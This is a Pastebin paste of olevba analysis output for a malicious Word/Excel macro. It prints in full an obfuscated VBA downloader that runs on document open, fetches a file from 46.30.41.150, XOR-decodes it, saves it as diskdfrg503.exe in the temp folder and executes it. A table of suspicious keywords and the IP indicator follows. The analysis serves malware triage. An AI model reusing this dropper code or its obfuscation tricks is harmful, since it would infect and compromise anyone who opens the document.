Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B-V vbaProject.bin
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: vbaProject.bin
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Auto_Open()
- naecHWEtHHtbM
- End Sub
- Function oUZDCYSBz(hfgudrRChN, NmLpvABWZN)
- Dim DlaQdYZnrwVM
- DlaQdYZnrwVM = ""
- Dim qGVuetJ
- qGVuetJ = 2 - 1
- Dim TiGjIdL
- TiGjIdL = 1
- For TiGjIdL = 1 To Len(hfgudrRChN)
- uXelSqetWAbrIT = Mid(NmLpvABWZN, qGVuetJ, 1)
- ZTpFUkV = Mid(hfgudrRChN, TiGjIdL, 1)
- DlaQdYZnrwVM = DlaQdYZnrwVM & Chr(Asc(ZTpFUkV) Xor Asc(uXelSqetWAbrIT))
- qGVuetJ = qGVuetJ + 1
- If Len(NmLpvABWZN) < qGVuetJ Then qGVuetJ = 1
- Next
- oUZDCYSBz = DlaQdYZnrwVM
- End Function
- Function pbAvnHvCOcZ(zryqVCxyWrr)
- Dim ZPoIibDoJR, JbFyoPNFoRxR, OqzPlKr, XukMzXujgUSsPa, JfAoyNSuxGLcqPL, PXUgFeibPlGgI
- Dim ygaoXnJ
- ZPoIibDoJR = 1
- JbFyoPNFoRxR = 2 - 1
- OqzPlKr = 1
- ygaoXnJ = LenB(zryqVCxyWrr)
- Do While ZPoIibDoJR <= ygaoXnJ
- tbdWcuFNGrQl = Chr(AscB(MidB(zryqVCxyWrr, ZPoIibDoJR, 1)))
- PXUgFeibPlGgI = PXUgFeibPlGgI & tbdWcuFNGrQl
- ZPoIibDoJR = ZPoIibDoJR + 1
- OqzPlKr = OqzPlKr + 1
- BxvasUlR = 300
- If OqzPlKr > BxvasUlR Then
- JfAoyNSuxGLcqPL = JfAoyNSuxGLcqPL & PXUgFeibPlGgI
- PXUgFeibPlGgI = ""
- OqzPlKr = (&H3EF + 2892 - &HF3A)
- JbFyoPNFoRxR = JbFyoPNFoRxR + 1
- If JbFyoPNFoRxR > 19 + 31 * (&H20 + 1142 - &H491) Then
- XukMzXujgUSsPa = XukMzXujgUSsPa & JfAoyNSuxGLcqPL
- JfAoyNSuxGLcqPL = ""
- JbFyoPNFoRxR = 1
- End If
- End If
- Loop
- pbAvnHvCOcZ = XukMzXujgUSsPa & JfAoyNSuxGLcqPL & PXUgFeibPlGgI
- End Function
- Sub naecHWEtHHtbM()
- Dim ltFbwRt As String
- LYMDaxRkb = ""
- tLnHKfZPzbhEI = "r" + "i" + "p"
- igWILjykMi = "hehcGpPQydpi" + "l" + "l"
- fsGnVrg = Replace(igWILjykMi, "hcGpPQydpi", "")
- HXNXvJiLqktuo = LYMDaxRkb + LYMDaxRkb + "WSc" + LYMDaxRkb + tLnHKfZPzbhEI + "t.S" + fsGnVrg + LYMDaxRkb
- SxvWbDoY = "" + "" + ".exe"
- jthCBDaaJRDpv = "diskdfrg503" & SxvWbDoY
- turiqEfvgMad = "Scripting.Fil" + "e" + "Sy" + "s"
- ZdLrJNCA = "e" + "c" + "t"
- vomJUBHkqH = "te" + "mO" + "b" + "j"
- dDNGqIfQPl = turiqEfvgMad + vomJUBHkqH + ZdLrJNCA
- Set eUMvBdooBUflklU = CreateObject(dDNGqIfQPl)
- UlNkpxXUjx = eUMvBdooBUflklU.GetSpecialFolder(2) & "\" + "\"
- lzUiTQJPens = UlNkpxXUjx & jthCBDaaJRDpv
- ltFbwRt = (2 + 30 + 1142 - 1169)
- LCNEmUMrVtZeK = "" + ".1"
- iwDokBl = "WinHt" + "t" + "p" + "."
- eYMbfyaRHJCv = iwDokBl + "WinHttp" + "Requ" + "est" + "." + ltFbwRt + LCNEmUMrVtZeK
- Set cnzZdwdShJh = CreateObject(eYMbfyaRHJCv, "")
- zesOpyaWimNkqH = "hcGpPQydpihtthcGpPQydpip://"
- XrTdGZXkSzDR = Replace(zesOpyaWimNkqH, "hcGpPQydpi", "")
- DlaQdYZnrwVM = XrTdGZXkSzDR + "46.30.41" + ".150/" + "bb.ty" + "p"
- ymgtVbmtxZ = "E" + "T"
- BfJmrmZbnp = "G"
- cnzZdwdShJh.Open "" + BfJmrmZbnp + ymgtVbmtxZ, DlaQdYZnrwVM, False
- cnzZdwdShJh.send
- If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
- eUMvBdooBUflklU.DeleteFile (lzUiTQJPens)
- End If
- If cnzZdwdShJh.Status = 100 + 100 Then
- xUmBoWIKxzpt = True
- Set fEHnLYbclJADSdF = eUMvBdooBUflklU.CreateTextFile(lzUiTQJPens, xUmBoWIKxzpt)
- YBlkuQGmcR = cnzZdwdShJh.responseBody
- fEHnLYbclJADSdF.Write oUZDCYSBz(pbAvnHvCOcZ(YBlkuQGmcR), "nkiO" + "aWs" + "g")
- fEHnLYbclJADSdF.Close
- End If
- If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then
- qBLjFDPZAWx = lzUiTQJPens
- CreateObject(HXNXvJiLqktuo).Run qBLjFDPZAWx
- End If
- End Sub
- Sub AutoOpen()
- LxuuCbj = "WOW " + "N" + "u" + "k" + "e"
- LxuuCbj = "WOW" + " Nuk" + "e"
- Auto_Open
- End Sub
- Sub Workbook_Open()
- Auto_Open
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | 46.30.41.150 | IPv4 address (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement